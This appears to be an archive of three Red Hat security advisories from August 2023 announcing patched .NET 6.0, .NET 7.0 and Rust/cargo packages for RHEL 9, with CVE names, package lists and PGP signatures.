Red Hat Security Advisory 2023-4639-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: .NET 6.0 security update  
Advisory ID:       RHSA-2023:4639-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4639  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-35390 CVE-2023-38180   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

Security Fix(es):

* dotnet: RCE under dotnet commands (CVE-2023-35390)

* dotnet: Kestrel vulnerability to slow read attacks leading to Denial of  
Service attack (CVE-2023-38180)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228621 - CVE-2023-38180 dotnet: Kestrel vulnerability to slow read attacks leading to Denial of Service attack  
2228622 - CVE-2023-35390 dotnet: RCE under dotnet commands

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
dotnet6.0-6.0.121-1.el9_0.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.21-1.el9_0.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-host-6.0.21-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-6.0.121-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el9_0.aarch64.rpm  
dotnet-templates-6.0-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el9_0.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.21-1.el9_0.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-host-6.0.21-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-6.0.121-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el9_0.s390x.rpm  
dotnet-templates-6.0-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el9_0.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.21-1.el9_0.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-host-6.0.21-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-6.0.121-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el9_0.x86_64.rpm  
dotnet-templates-6.0-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35390  
https://access.redhat.com/security/cve/CVE-2023-38180  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2oyFAAoJENzjgjWX9erEj2oP/RqK1aqGXClVXAeBRTHaLI3B  
fg+/K4jJhw4Mgahi0xQBTYwNT1i0z1W7pCWtbqmj/o1dXCUBkKJratvown4xJeiP  
Yq24yzQdMwsY60p1UDKlRoFJ6zJqTqSO75xPTRInnUIzS3s4WjGl1d0iO3q4En+z  
Cr2s7q3MnBhJvGprwx4WdyZMoQ/8k/4wnubkUT+5TPw400xsJAs57vJGdkSDLQ6o  
3AQf4WXJjv/qJMo2gdIVWUt5KFe6J4Jjf7Y+lgS5cyXpdU+4galf5Vg3SCVJxEl8  
ejZ/tsPmsdgFQFoBtBj7QlOuOGVEpkStD4jiUmjLO2btJq9ajVgT1x8e41gW3XQV  
afQYaJouneYJZq5i6ukIXisu3pPjjlt9BB7pUyCFhmbFTp8s40BfskyW/wCbut8F  
vac+zhLdSl/9yGoWhZZ6xugrBKbSdEmmqgWsZi7u0Yjt7iFaU7LuTHIutEisckEj  
sUpnVif+eO4vp2NON5xCrLSE4Cnl7Ox3yHY8SivcdKE+2QFWHzVyt4QzXaG6YsmA  
SVR/zigWF3V9iUZyYZgc4z2nPbzkQVTOdyWL825ETFNrzoSVXKgmnuCpEi8fvNAd  
EQn8dzlslRcZRfJm1Abk9NpmxpGWZKhvfH2nSci183/i8+wT3F2X4Ie38cg1hmdM  
XY9iRvmyIBdY4OP61UKL  
=F+Qn  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4639-01

Red Hat Security Advisory 2023-4634-01 - Rust Toolset provides the Rust programming language compiler rustc, the cargo build tool and dependency manager, and required libraries.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: rust security update  
Advisory ID:       RHSA-2023:4634-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4634  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-38497   
=====================================================================

1. Summary:

An update for rust is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Rust Toolset provides the Rust programming language compiler rustc, the  
cargo build tool and dependency manager, and required libraries.

Security Fix(es):

* rust-cargo: cargo does not respect the umask when extracting dependencies  
(CVE-2023-38497)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228038 - CVE-2023-38497 rust-cargo: cargo does not respect the umask when extracting dependencies

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
rust-1.66.1-2.el9_2.src.rpm

aarch64:  
cargo-1.66.1-2.el9_2.aarch64.rpm  
cargo-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
clippy-1.66.1-2.el9_2.aarch64.rpm  
clippy-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
rust-1.66.1-2.el9_2.aarch64.rpm  
rust-analysis-1.66.1-2.el9_2.aarch64.rpm  
rust-analyzer-1.66.1-2.el9_2.aarch64.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
rust-debuginfo-1.66.1-2.el9_2.aarch64.rpm  
rust-debugsource-1.66.1-2.el9_2.aarch64.rpm  
rust-doc-1.66.1-2.el9_2.aarch64.rpm  
rust-std-static-1.66.1-2.el9_2.aarch64.rpm  
rust-toolset-1.66.1-2.el9_2.aarch64.rpm  
rustfmt-1.66.1-2.el9_2.aarch64.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.aarch64.rpm

noarch:  
rust-debugger-common-1.66.1-2.el9_2.noarch.rpm  
rust-gdb-1.66.1-2.el9_2.noarch.rpm  
rust-lldb-1.66.1-2.el9_2.noarch.rpm  
rust-src-1.66.1-2.el9_2.noarch.rpm  
rust-std-static-wasm32-unknown-unknown-1.66.1-2.el9_2.noarch.rpm  
rust-std-static-wasm32-wasi-1.66.1-2.el9_2.noarch.rpm

ppc64le:  
cargo-1.66.1-2.el9_2.ppc64le.rpm  
cargo-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
clippy-1.66.1-2.el9_2.ppc64le.rpm  
clippy-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
rust-1.66.1-2.el9_2.ppc64le.rpm  
rust-analysis-1.66.1-2.el9_2.ppc64le.rpm  
rust-analyzer-1.66.1-2.el9_2.ppc64le.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
rust-debuginfo-1.66.1-2.el9_2.ppc64le.rpm  
rust-debugsource-1.66.1-2.el9_2.ppc64le.rpm  
rust-doc-1.66.1-2.el9_2.ppc64le.rpm  
rust-std-static-1.66.1-2.el9_2.ppc64le.rpm  
rust-toolset-1.66.1-2.el9_2.ppc64le.rpm  
rustfmt-1.66.1-2.el9_2.ppc64le.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.ppc64le.rpm

s390x:  
cargo-1.66.1-2.el9_2.s390x.rpm  
cargo-debuginfo-1.66.1-2.el9_2.s390x.rpm  
clippy-1.66.1-2.el9_2.s390x.rpm  
clippy-debuginfo-1.66.1-2.el9_2.s390x.rpm  
rust-1.66.1-2.el9_2.s390x.rpm  
rust-analysis-1.66.1-2.el9_2.s390x.rpm  
rust-analyzer-1.66.1-2.el9_2.s390x.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.s390x.rpm  
rust-debuginfo-1.66.1-2.el9_2.s390x.rpm  
rust-debugsource-1.66.1-2.el9_2.s390x.rpm  
rust-doc-1.66.1-2.el9_2.s390x.rpm  
rust-std-static-1.66.1-2.el9_2.s390x.rpm  
rust-toolset-1.66.1-2.el9_2.s390x.rpm  
rustfmt-1.66.1-2.el9_2.s390x.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.s390x.rpm

x86_64:  
cargo-1.66.1-2.el9_2.x86_64.rpm  
cargo-debuginfo-1.66.1-2.el9_2.i686.rpm  
cargo-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
clippy-1.66.1-2.el9_2.x86_64.rpm  
clippy-debuginfo-1.66.1-2.el9_2.i686.rpm  
clippy-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
rust-1.66.1-2.el9_2.x86_64.rpm  
rust-analysis-1.66.1-2.el9_2.x86_64.rpm  
rust-analyzer-1.66.1-2.el9_2.x86_64.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.i686.rpm  
rust-analyzer-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
rust-debuginfo-1.66.1-2.el9_2.i686.rpm  
rust-debuginfo-1.66.1-2.el9_2.x86_64.rpm  
rust-debugsource-1.66.1-2.el9_2.i686.rpm  
rust-debugsource-1.66.1-2.el9_2.x86_64.rpm  
rust-doc-1.66.1-2.el9_2.x86_64.rpm  
rust-std-static-1.66.1-2.el9_2.i686.rpm  
rust-std-static-1.66.1-2.el9_2.x86_64.rpm  
rust-toolset-1.66.1-2.el9_2.x86_64.rpm  
rustfmt-1.66.1-2.el9_2.x86_64.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.i686.rpm  
rustfmt-debuginfo-1.66.1-2.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38497  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2oyDAAoJENzjgjWX9erENoQP/jTfkxW4QnmAoKoj/RfesY37  
Z17/QgOELXVroRlDG0QEPxLccxa1M8FOH+uoJtCOypm65WT3BM/+6oCfMJnycee8  
aGWuo3KN8aY0P8KO83zFWzjgrJznzqa96JRclSVnSlugZ+SUvCSS/1+J/XLMDUIN  
TGhVVwbweep8w1+u05d8OWRlbZcMVkHVJf0WQksVKECxgCuYddDYAGTYRlMohxVm  
IPE84HHBFD/iA4Hg89b9c5u6SCLrNj16p/pvn5vldWDEU6Vf31BAH2uAt2d1lGWk  
LFWNfbg7tC0/8RGq+xnmtdnpHFaSY1dpHqZiIRgvjKReq35h47esptuIWs1dwaZ6  
x9SWXqVHjVz87R1mcFsKhlY7I4l5vEC5lAfjX5fNOnhVbjou9gmmsMsUFpYU+1XV  
uJGAGZ/rMbqz/G0FyeCd14qTqZATf86BgKmqcSuHu3zMx2y8+59PqgBhYBGzN3Tu  
F2TkuUDD8pNQMsmE7qIzZK3/SGb0DgpMQOScs9fmEubsyeODKDG/2EV8zrF7d2nO  
Sr+hQntTAhzB4L+CaFNRNo+rbcbOOidgPK60MOaXux7vwf5Wyahbx9qzghfUBLVc  
QnTCU+bhq/u0GIo/SFh6zRoyhfGqdeIv1Ychlkc9CvsKLM9GUhiuFhoHKewqXQL5  
L1GELcNRzWCW0SpJXtOn  
=RO5t  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4634-01

Red Hat Security Advisory 2023-4642-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.110 and .NET Runtime 7.0.10. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: .NET 7.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4642-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4642  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-35390 CVE-2023-38180   
=====================================================================

1. Summary:

An update for .NET 7.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 7.0.110 and .NET Runtime  
7.0.10.

Security Fix(es):

* dotnet: RCE under dotnet commands (CVE-2023-35390)

* dotnet: Kestrel vulnerability to slow read attacks leading to Denial of  
Service attack (CVE-2023-38180)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228621 - CVE-2023-38180 dotnet: Kestrel vulnerability to slow read attacks leading to Denial of Service attack  
2228622 - CVE-2023-35390 dotnet: RCE under dotnet commands

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dotnet7.0-7.0.110-1.el9_2.src.rpm

aarch64:  
aspnetcore-runtime-7.0-7.0.10-1.el9_2.aarch64.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el9_2.aarch64.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el9_2.aarch64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-host-7.0.10-1.el9_2.aarch64.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el9_2.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-runtime-7.0-7.0.10-1.el9_2.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-sdk-7.0-7.0.110-1.el9_2.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.aarch64.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el9_2.aarch64.rpm  
dotnet-templates-7.0-7.0.110-1.el9_2.aarch64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.aarch64.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.aarch64.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el9_2.aarch64.rpm

ppc64le:  
aspnetcore-runtime-7.0-7.0.10-1.el9_2.ppc64le.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-host-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-runtime-7.0-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-sdk-7.0-7.0.110-1.el9_2.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.ppc64le.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-templates-7.0-7.0.110-1.el9_2.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.ppc64le.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.ppc64le.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el9_2.ppc64le.rpm

s390x:  
aspnetcore-runtime-7.0-7.0.10-1.el9_2.s390x.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el9_2.s390x.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el9_2.s390x.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-host-7.0.10-1.el9_2.s390x.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el9_2.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-runtime-7.0-7.0.10-1.el9_2.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-sdk-7.0-7.0.110-1.el9_2.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.s390x.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el9_2.s390x.rpm  
dotnet-templates-7.0-7.0.110-1.el9_2.s390x.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.s390x.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.s390x.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el9_2.s390x.rpm

x86_64:  
aspnetcore-runtime-7.0-7.0.10-1.el9_2.x86_64.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el9_2.x86_64.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el9_2.x86_64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-host-7.0.10-1.el9_2.x86_64.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el9_2.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-runtime-7.0-7.0.10-1.el9_2.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-sdk-7.0-7.0.110-1.el9_2.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.x86_64.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el9_2.x86_64.rpm  
dotnet-templates-7.0-7.0.110-1.el9_2.x86_64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.x86_64.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.x86_64.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el9_2.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.aarch64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el9_2.aarch64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.aarch64.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.aarch64.rpm

ppc64le:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.ppc64le.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el9_2.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.ppc64le.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.ppc64le.rpm

s390x:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.s390x.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el9_2.s390x.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.s390x.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.s390x.rpm

x86_64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-host-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el9_2.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el9_2.x86_64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el9_2.x86_64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el9_2.x86_64.rpm  
dotnet7.0-debugsource-7.0.110-1.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35390  
https://access.redhat.com/security/cve/CVE-2023-38180  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2ox/AAoJENzjgjWX9erE3m0P/3Sex1StL/7G1iFbGqyhNayB  
+0vZAwhSa7cmj7anALRPBHSNsJ97Pc/2rWzCwh3FVec2sfJvguD/keht/ghoiVS/  
Z6XV8BC95gKgQCnrSGhu0GoJydF1ldyuKQ5R+WTUJf4EMohohRiLC30qSjSXST87  
DSyF2YYPVD5hlhxYCXr4RM5oiv+ebjeDKqnGA51PptFzhPYOfZvCOVIKKP3WyHzp  
rkGZ5qmJnTvWRrsEbrdl7WAFGCLpI6O0PbbOXaCkjyF0Gfd1w1gFz24vuXrq3UpI  
VWWZVq0fsu5Y7d6VfsBQuF5wAQgFH0rS+9HJNRiV6g96ACgBR4JCR4gffL8z1aJu  
8vAQyjORsTyAKiWbqzzOzJLKvfyLXEZD6FkGsiX/2PZMeecLFb80dpmukzfqqO8y  
eOP18EDnu98jvT93zLFlksCraNQYMo5WtmGScNy59vVZtWr9koH3gDlCfzzPVON2  
k4myijqhHPNmOEDq5fGaAb8Xr7iN9O9J3VhPDQXH9uCPh1eVnl6bNTksEw1zbMw6  
4aPHJ5Rg+uWLk4VU6+GdJK9rFjdKTlPoIv4mi471LRGhMDdfIBzb/KlrEjiWjBid  
